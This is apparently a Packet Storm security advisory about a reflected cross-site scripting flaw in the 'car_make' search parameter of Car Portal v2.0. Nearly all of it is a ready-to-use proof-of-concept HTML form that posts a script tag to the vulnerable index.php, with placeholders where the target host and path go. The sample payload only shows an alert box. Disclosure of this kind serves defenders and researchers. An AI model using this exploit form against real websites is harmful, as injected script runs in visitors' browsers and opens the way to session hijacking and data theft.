Car Portal version 2.0 suffers from a cross site scripting vulnerability.
3f88bd6aabf64f6db831ac79eaac665b1220d768cc7494e9b4962c9ccfd3a9be<!--
TITLE: Car Portal v2.0 "car_make" Cross-Site Scripting Vulnerability
PRODUCT: Car Portal v2.0
PRODUCT URL: http://www.netartmedia.net/carsportal/
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/
-->
<html>
<body>
<form method="post" action="http://[host]/[path]/index.php">
<input type="hidden" name="ProceedSearch" value="1">
<input type="hidden" name="mod" value="cars_search">
<input type="hidden" name="lang" value="en">
<input type="hidden" name="Step" value="1">
<input type="hidden" name="car_make" value="<script>alert(1337)</script>">
<input type="hidden" name="car_model" value="All">
<input type="hidden" name="car_year_from" value="1983">
<input type="hidden" name="car_year_to" value="1987">
<input type="hidden" name="zip" value="">
<input type="hidden" name="order_by" value="price">
<input type="submit">
</form>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed